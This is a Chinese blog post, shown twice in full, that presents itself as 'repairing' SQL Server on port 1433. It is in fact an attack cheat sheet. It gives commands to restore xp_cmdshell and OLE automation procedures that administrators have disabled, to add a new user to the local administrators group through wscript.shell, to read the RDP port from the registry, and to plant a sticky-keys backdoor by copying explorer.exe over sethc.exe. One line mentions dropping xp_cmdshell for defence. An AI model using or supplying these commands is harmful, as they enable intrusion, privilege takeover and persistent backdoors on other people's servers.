超全1433的SQL语句修复

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/david_520042/article/details/5907533

超全1433的SQL语句修复



  无需登录分离器,利用SQL命令直接恢复xp_cmdshell

  恢复命令:

  
dbcc addextendedproc ("sp_oacreate","odsole70.dll")

  dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

  未能找到存储过程'master..xpcmdshell'之解决方法,恢复命令:

  EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  恢复odsole70.dll:

  exec sp_addextendedproc sp_OAMethod,'odsole70.dll'

  exec sp_addextendedproc sp_OACreate,'odsole70.dll'

  如果报“SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问

  解决方法:执行下面的语句


  -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the currently configured value for advanced options. RECONFIGURE GO -- To enable the feature. EXEC sp_configure 'xp_cmdshell', 1 GO -- To update the currently configured value for this feature. RECONFIGURE GO

  开启cmdshell的SQL语句

  
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

  判断存储扩展是否存在

  Select count(*) from master.dbo.sysobjects where xtype='X' and

  返回结果为1就OK

  恢复xp_cmdshell

  Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and

  返回结果为1就OK

  否则上传xplog7.0.dll

  Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'【c:/winnt/system32/xplog70.dll是文件路径,有些服务器的SQL并不是安装在C盘,需要用SQLTools查看】

  无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

  第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

  第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

  恢复方法:查询分离器连接后,

  第一步执行:exec sp_dropextendedproc 'xp_cmdshell'

  第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

  找不到存储过程 sp_addextendedproc

  create procedure sp_addextendedproc @functname nvarchar(517),/* (owner. name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 【网上的代码是create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner. name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 可是我发现是没用的,我把时间1996/08/30 20:13去掉就有用了】

  突破xplog70.dll建立用户

  declare @cmd INT

  exec sp_oacreate 'wscript.shell',@cmd output

  exec sp_oamethod @cmd,'run',null,'net user 用户名 密码 /add','0','true'

  declare @cmd INT

  exec sp_oacreate 'wscript.shell',@cmd output

  exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用户名 /add','0','true'

  不想别人拿到服务器那就去除SA的xp_cmdshell权限

  use master

  sp_dropextendedproc 'xp_cmdshell'

  恢复sa的权限

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  提示Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)先查看是否存在C盘下是否存在cmd.exe,SQL安装目录是否存在odsole70.dll这个文件,如果这2个都有那就有希望,此案用SQL命令查看终端端口及开放情况

  exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp','PortNumber' ①可以建立shift后门,2条指令

  //这条语句将explorer.exe复制为sethc.exe

  declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';

  //这条语句将sethc.exe复制到dllcache目录下

  declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';

超全1433的SQL语句修复

4小时前

  无需登录分离器,利用SQL命令直接恢复xp_cmdshell

  恢复命令:

  
dbcc addextendedproc ("sp_oacreate","odsole70.dll")

  dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

  未能找到存储过程'master..xpcmdshell'之解决方法,恢复命令:

  EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  恢复odsole70.dll:

  exec sp_addextendedproc sp_OAMethod,'odsole70.dll'

  exec sp_addextendedproc sp_OACreate,'odsole70.dll'

  如果报“SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问

  解决方法:执行下面的语句


  -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the currently configured value for advanced options. RECONFIGURE GO -- To enable the feature. EXEC sp_configure 'xp_cmdshell', 1 GO -- To update the currently configured value for this feature. RECONFIGURE GO

  开启cmdshell的SQL语句

  
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

  判断存储扩展是否存在

  Select count(*) from master.dbo.sysobjects where xtype='X' and

  返回结果为1就OK

  恢复xp_cmdshell

  Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and

  返回结果为1就OK

  否则上传xplog7.0.dll

  Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'【c:/winnt/system32/xplog70.dll是文件路径,有些服务器的SQL并不是安装在C盘,需要用SQLTools查看】

  无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

  第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

  第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

  恢复方法:查询分离器连接后,

  第一步执行:exec sp_dropextendedproc 'xp_cmdshell'

  第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

  找不到存储过程 sp_addextendedproc

  create procedure sp_addextendedproc @functname nvarchar(517),/* (owner. name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 【网上的代码是create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner. name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 可是我发现是没用的,我把时间1996/08/30 20:13去掉就有用了】

  突破xplog70.dll建立用户

  declare @cmd INT

  exec sp_oacreate 'wscript.shell',@cmd output

  exec sp_oamethod @cmd,'run',null,'net user 用户名 密码 /add','0','true'

  declare @cmd INT

  exec sp_oacreate 'wscript.shell',@cmd output

  exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用户名 /add','0','true'

  不想别人拿到服务器那就去除SA的xp_cmdshell权限

  use master

  sp_dropextendedproc 'xp_cmdshell'

  恢复sa的权限

  sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  提示Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)先查看是否存在C盘下是否存在cmd.exe,SQL安装目录是否存在odsole70.dll这个文件,如果这2个都有那就有希望,此案用SQL命令查看终端端口及开放情况

  exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp','PortNumber' ①可以建立shift后门,2条指令

  //这条语句将explorer.exe复制为sethc.exe

  declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';

  //这条语句将sethc.exe复制到dllcache目录下

  declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';

铁观音-厂家直销

没有更多推荐了,返回首页